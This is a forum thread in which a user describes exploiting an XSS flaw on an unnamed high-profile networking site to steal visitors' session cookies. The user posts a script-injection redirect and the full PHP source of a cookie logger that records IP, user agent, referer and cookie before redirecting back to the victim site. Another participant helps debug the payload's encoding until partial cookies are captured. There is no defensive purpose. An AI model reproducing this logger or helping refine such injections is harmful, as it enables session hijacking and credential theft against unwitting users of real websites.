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One-Click XSS Cookie Logger

ghost's Avatar
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Okay, so.

I've found an XSS vulnerability in a high profile networking site. The url looks something like this:


an injection such as the following after the "blank" variable works: markup<script>window.location="http://www.goatse.cz";</script>

however, I don't merely want to send people to goatse. I'd like to grab their cookies. So when I attempt to craft a url to send them to my logging hub, like so:


the injection does not work. any idea as to what I could be doing wrong? here's the source to the logger:

$user_agent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$cookie = stripslashes( $_GET['c00kie'] );

$string = $ip . "\n" . $user_agent . "\n" . $referer . "\n" . $cookie;

$fp = fopen('log.txt', 'a');
fwrite($fp, $string . "\n\n");

Header ("Location: http://victimsite.com/nonsuspiciouslookingpage");


spyware's Avatar
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Does the "+" get filtered maybe?

ghost's Avatar
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hm, perhaps, let me try encoding it.

ghost's Avatar
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aha! that kinda works. I'm getting a part of the cookie.

spyware's Avatar
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lesserlightsofheaven wrote: aha! that kinda works. I'm getting a part of the cookie.

What part are you NOT getting?

ghost's Avatar
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all the juicy bits, sadly =P.

one part of the cookie contains the IP, another the location, and the next two are long hashed values.

all I get is the IP.